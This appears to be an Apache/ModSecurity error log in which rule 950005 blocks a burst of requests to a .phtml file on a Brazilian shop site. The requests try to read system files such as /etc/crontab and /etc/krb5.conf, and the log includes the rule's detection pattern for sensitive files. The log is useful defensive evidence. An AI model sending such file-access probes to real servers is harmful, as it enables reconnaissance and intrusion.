[Thu Mar 19 18:58:01.402593 2026] [:error] [pid 7545:tid 140411741927168] [client 57.141.18.114:56104] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxaX8B84UptSoTJtY57QAAAYA"]
[Thu Mar 19 18:58:01.638233 2026] [:error] [pid 20435:tid 140411624429312] [client 57.141.18.74:56108] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxaZJaM1-0uhhUQJNEIAAAAI4"]
[Thu Mar 19 18:58:03.031550 2026] [:error] [pid 20435:tid 140411590858496] [client 57.141.18.5:56134] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxa5JaM1-0uhhUQJNEJgAAAJI"]
[Thu Mar 19 18:58:03.731496 2026] [:error] [pid 20435:tid 140411632822016] [client 57.141.18.81:56146] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxa5JaM1-0uhhUQJNEKQAAAI0"]
[Thu Mar 19 18:58:03.987505 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.66:56148] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxawkwaGbbGflqUZD2vwAAAME"]
[Thu Mar 19 18:58:04.534571 2026] [:error] [pid 7545:tid 140411616036608] [client 57.141.18.49:56162] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbH8B84UptSoTJtY57gAAAY8"]
[Thu Mar 19 18:58:04.963680 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.124:56170] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbAkwaGbbGflqUZD2wQAAAME"]
[Thu Mar 19 18:58:05.386628 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.11:56178] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbfXLqtnMIWvjpaJJswAAAog"]
[Thu Mar 19 18:58:07.028930 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.78:56184] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbf-YZRR_7pZ7nDK2PgAAA8k"]
[Thu Mar 19 18:58:07.058171 2026] [:error] [pid 17653:tid 140411683178240] [client 57.141.18.16:56198] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbsdf6f5d65gmYZSk4gAAAsc"]
[Thu Mar 19 18:58:07.058807 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.114:56196] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbvu8EFLIOrSqIpvTfwAAAlY"]
[Thu Mar 19 18:58:07.302235 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.10:56210] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxbxCii7xarUs8iHYWgwAAAhU"]
[Thu Mar 19 18:58:09.064911 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.80:56248] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxcRCii7xarUs8iHYWhAAAAhU"]
[Thu Mar 19 18:58:09.369056 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.15:56250] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxcfXLqtnMIWvjpaJJtQAAAo8"]
[Thu Mar 19 18:58:10.030394 2026] [:error] [pid 8307:tid 140411649607424] [client 57.141.18.94:56262] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxcr-FhjpZGs9ba8qWFgAAAws"]
[Thu Mar 19 18:58:10.200973 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.64:56266] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxcvu8EFLIOrSqIpvTgQAAAkE"]
[Thu Mar 19 18:58:10.792223 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.42:56276] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxcgbLMZ6AikZjR9WG8gAAAAg"]
[Thu Mar 19 18:58:12.482013 2026] [:error] [pid 20435:tid 140411557287680] [client 57.141.18.67:56302] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxdJJaM1-0uhhUQJNELgAAAJY"]
[Thu Mar 19 18:58:14.089271 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.23:56322] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxdda6ubjKNq_cu4aAGwAAA0M"]
[Thu Mar 19 18:58:14.090274 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.102:56326] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxdb-FhjpZGs9ba8qWFwAAAwU"]
[Thu Mar 19 18:58:15.266624 2026] [:error] [pid 7545:tid 140411641214720] [client 57.141.18.8:56346] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxd38B84UptSoTJtY58QAAAYw"]
[Thu Mar 19 18:58:16.920548 2026] [:error] [pid 21563:tid 140411658000128] [client 57.141.18.74:56394] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxeEpm7ZmxKZTM4bZw9QAAA4o"]
[Thu Mar 19 18:58:18.751101 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.100:56436] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxegbLMZ6AikZjR9WG9AAAAAg"]
[Thu Mar 19 18:58:19.058675 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.0:56438] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxe8df6f5d65gmYZSk5wAAAsg"]
[Thu Mar 19 18:58:19.338632 2026] [:error] [pid 21563:tid 140411624429312] [client 57.141.18.107:56444] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxe0pm7ZmxKZTM4bZw9wAAA44"]
[Thu Mar 19 18:58:19.917843 2026] [:error] [pid 7545:tid 140411607643904] [client 57.141.18.35:56460] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxe38B84UptSoTJtY59AAAAZA"]
[Thu Mar 19 18:58:20.130098 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:58:20.243192 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.59:56466] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxfP-YZRR_7pZ7nDK2QwAAA8k"]
[Thu Mar 19 18:58:20.845018 2026] [:error] [pid 17653:tid 140411574073088] [client 57.141.18.58:56482] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxfMdf6f5d65gmYZSk6QAAAtQ"]
